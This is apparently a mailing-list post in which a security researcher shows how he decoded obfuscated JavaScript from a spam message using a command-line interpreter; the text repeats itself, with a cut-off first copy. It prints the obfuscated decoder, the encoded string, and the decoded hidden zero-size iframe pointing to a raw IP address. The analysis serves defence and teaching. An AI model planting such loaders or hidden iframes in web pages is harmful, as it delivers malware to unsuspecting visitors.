here's how i arrived at that. there's a free command line JavaScript
interpreter that can help with evaluating malicious javascript. i did the
port for OpenBSD years ago, and the source is available for all at
http://www.njs-javascript.org/
i extracted the javascript functions from the forwarded message and loaded
it into a file, bad2.js:
i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=
String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}
//document.write(r) // JN no document object
print(r); // JN so print it instead
}
}
dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUko
j9woifNDs5kfAMT')
i made some modifications to deal with the fact that there is no document
object in this context. see the "JN" comments. now when i use the
javascript toolkit, i can acutally run it. it will print the decoded
string object 'r':
(tags obfuscated) this is what your browser would see and load. unless
your spam/scam detection engine also ran the javascript, it wouldn't see
that. hence, obfuscation.
hopefully this helps people out there decode questionable javasript in the
future.
________
jose nazario, ph.d. jose (at) monkey (dot) org [email concealed]
http://monkey.org/~jose/ http://infosecdaily.net/
http://www.wormblog.com/
obfuscated the tags):
[iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe]
here's how i arrived at that. there's a free command line JavaScript
interpreter that can help with evaluating malicious javascript. i did the
port for OpenBSD years ago, and the source is available for all at
http://www.njs-javascript.org/
i extracted the javascript functions from the forwarded message and loaded
it into a file, bad2.js:
$ cat bad2.js
function dc(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,6,22,2,4,19,56,49
,24,46,0,0,0,0,0,0,61,0,5,58,48,51,17,18,13,16,11,20,27,47,60,53,8,57,14
,7,9
,55,36,31,1,40,15,0,0,0,0,44,0,33,41,52,62,32,50,28,43,10,21,12,26,42,59
,38,
39,34,29,23,45,3,37,25,30,35,54);for(j=Math.ceil(l/b);j>0;j--){r='';for(
i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=
String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}
//document.write(r) // JN no document object
print(r); // JN so print it instead
}
}
dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUko
j9woifNDs5kfAMT')
i made some modifications to deal with the fact that there is no document
object in this context. see the "JN" comments. now when i use the
javascript toolkit, i can acutally run it. it will print the decoded
string object 'r':
$ js bad2.js
[iframe src=http://63.134.215.88/a/ height=0 width=0][/iframe]
(tags obfuscated) this is what your browser would see and load. unless
your spam/scam detection engine also ran the javascript, it wouldn't see
that. hence, obfuscation.
hopefully this helps people out there decode questionable javasript in the
future.
________
jose nazario, ph.d. jose (at) monkey (dot) org [email concealed]
http://monkey.org/~jose/ http://infosecdaily.net/
http://www.wormblog.com/
[ reply ]